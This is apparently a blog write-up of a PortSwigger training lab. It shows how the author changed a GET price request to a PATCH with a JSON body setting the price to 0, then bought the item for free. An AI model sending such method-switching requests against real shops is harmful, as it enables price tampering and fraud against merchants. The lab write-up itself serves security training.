Bismillah

API Lab: Finding and exploiting an unused API endpoint

Lab Source: PortSwigger Web Security Academy

API Endpoints can cause problems if they're not secured well.
In this lab, I exploited a get price API call:

While adding an item to the cart, I noticed the following api request was made for the price of the item:

GET /api/products/1/price

The initial thought was to modify this request to change the price from the current one to $0.

How did I do it?

1. I changed the request header from GET to PATCH for the same endpoint as follows:

PATCH /api/products/1/price

2. When attempting to send the request I kept getting an error "content type not supported, with JSON as the expected content type. This prompted me to add a content type header and specify it as JSON as follows:

Content-Type: application/json; charset=utf-8

3. And added the price change in JSON format
{ "price":0 }

4. Thus the whole request changes to the following:
PATCH /api/products/1/price HTTP/2 Host: ...... Content-Type: application/json; charset=utf-8 Cookie: ..... User-Agent: ..... Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: ..../product?productId=1 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Content-Length: 15

{ "price":0 }

With this request returning a successful price change:

I then re-added the item to the cart and placed the order:

Practice API bug successfully exploited!!

Lab: https://portswigger.net/web-security/api-testing/lab-exploiting-unused-api-endpoint